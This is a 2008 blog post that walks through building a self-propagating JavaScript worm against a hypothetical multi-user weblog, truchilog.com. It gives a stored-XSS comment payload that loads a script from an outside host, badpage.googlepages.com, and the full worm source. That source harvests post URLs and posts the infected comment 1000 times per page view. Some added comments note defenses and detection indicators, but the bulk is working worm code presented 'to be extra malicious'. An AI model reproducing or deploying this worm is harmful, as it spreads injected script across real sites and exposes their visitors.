lunes, 21 de abril de 2008

Super Lamer Javascript Worm

In this case we will discuss how to build the most basic JavaScript Worm exploiting a JavaScript injection.

First, you need to find a multi-user weblog system that is affected by a JavaScript injection in the comments left by visitors; we will call it www.truchilog.com. For example, when a visitor enters his name, he may be able to input:

</a><script src=http://badpage.googlepages.com/j.js></script><a>

This injects a small JavaScript snippet that loads another, arbitrarily long script hosted on a free service like GooglePages. It works only because the site writes the visitor's name into the page without HTML-encoding it. To use its full viral power, the worm must infect new weblogs by posting new malformed comments on other weblogs.

Note that in JavaScript, to read the result of an HTTP request, the request must be sent to the same domain the page came from. In this basic worm, the new victims are retrieved from the home page of the weblog system, i.e. '/'. Then, using a regular expression, we locate new weblogs or posts on the home page and proceed with an HTTP POST request to inject the viral payload into a comment.

In this hypothetical example, the detected weblog posts have the form 'name.truchilog.com/post_number'. The complete code of j.js follows; notice that, to be extra malicious, the victims are infected 1000 times.

/**
 * Create an HTTP request object that works across browsers.
 *
 * Tries the native XMLHttpRequest constructor first; if that throws, walks
 * the list of legacy Internet Explorer ActiveX ProgIDs, newest first, and
 * returns the first one that can be instantiated.
 *
 * @returns {Object} a freshly constructed request object
 * @throws {Error} 'No XHR object' when neither mechanism is available
 */
function init_conn() {
  try {
    return new XMLHttpRequest();
  } catch (nativeFailure) {
    // Native constructor unavailable: fall back to the ActiveX ProgIDs below.
  }

  var progIds = [
    'MSXML2.XMLHTTP.5.0',
    'MSXML2.XMLHTTP.4.0',
    'MSXML2.XMLHTTP.3.0',
    'MSXML2.XMLHTTP',
    'Microsoft.XMLHTTP'
  ];

  for (var idx = 0; idx < progIds.length; idx++) {
    try {
      return new ActiveXObject(progIds[idx]);
    } catch (activeXFailure) {
      // This ProgID is not registered; try the next one.
    }
  }

  // Every candidate failed.
  throw new Error('No XHR object');
}


/**
 * Propagation step of the example worm.
 *
 * Scans `text` for post URLs of the form http://<user>.truchilog.com/<number>/
 * and, for every match, submits one comment to /commentaries.php whose Name
 * field carries the URL-encoded `</a><script src=...j.js></script><a>`-style
 * tag, so that the commented post in turn loads j.js for its visitors.
 *
 * NOTE(defense): the whole chain depends on the comment form's Name value
 * being written back into the page as markup. Encoding that field on output
 * (and rejecting markup in it on input) breaks propagation at this point.
 *
 * @param {string} text - response body handed in by p()
 */
function infect(text) {

// harvest the user and post_num from the last posts.
var regexp = new RegExp('http://[a-z0-9_]+.truchilog.com/[0-9]+/','g');
var mymatch = text.match(regexp);

for (var i = 0; i < mymatch.length; i++) {

// var mymatch = myregexp.exec(text);
chain = new String(mymatch[i]);
pieces = chain.split ("/"); // split the URL on "/": [scheme, "", host, post number, ""]

user = pieces[2].split(".")[0];
post_num = pieces[3]

// inject the small javascript in
// the post using the name and post_num collected

// URI to send params to. It is relative, so the browser sends the request
// to the origin that served the page running this script; F and P select
// the weblog and the post that receive the comment.
var targetURI = "/commentaries.php?F="+user+"&P="+post_num;
// Form body. Name decodes to a closing </a>, a <script> tag pointing at
// badpage.googlepages.com/j.js, and nothing else; Commentary is a fixed string.
// NOTE(detection): both values are constant, so comments whose Name contains
// "<script" or whose text is "Hello_your_blog_was_infected" are direct
// indicators of this sample in stored data and request logs.
var params = 'Name=%3C%2Fa%3E%3Cscript+src%3Dhttp%3A%2F%2F';
params += 'badpage.googlepages.com%2Fj.js%3E%3C%2Fscript%3E&';
params += 'Commentary=Hello_your_blog_was_infected&EMail=&';
params += 'URLPage=&x=65&y=4';
xmlhttp = init_conn();
// Open an asynchronous POST and then set headers.
xmlhttp.open("POST", targetURI, true);
xmlhttp.setRequestHeader("Content-type",
"application/x-www-form-urlencoded");
xmlhttp.setRequestHeader("Content-length", params.length);
xmlhttp.setRequestHeader("Connection", "close");
// Send the parameters to the target; the response is never read.
xmlhttp.send(params);
}

}

// readystatechange handler for the module-level request R (the fetch of the
// latest-posts listing). Once the response is complete it hands the body to
// infect() 1000 times.
//
// NOTE(detection): one page view therefore produces 1000 comment POSTs per
// matched post URL. That request volume from a single client is itself a
// strong signal, and per-client rate limiting on the comment endpoint caps
// the damage.

function p()
{
// readyState 4 means the request has finished
if(R.readyState==4)
{
var text = R.responseText;
// Setup a variable (declared but not used in this function).
var xmlhttp;
// infect many times
for(i=0; i < 1000; i++) {
infect(text);
}
}
}

// Entry point: runs as soon as j.js has been loaded by an infected page.
// Issues an asynchronous GET for /lastPosts.php on the current origin and
// registers p() to process the response.
//
// NOTE(defense): execution only reaches this point because the page loaded a
// script from an external host. A Content-Security-Policy that restricts
// script sources to the site's own origin would stop the sample before any
// request is made.
var R= init_conn();
R.onreadystatechange=p;
R.open('GET','/lastPosts.php',true);
R.send(null);


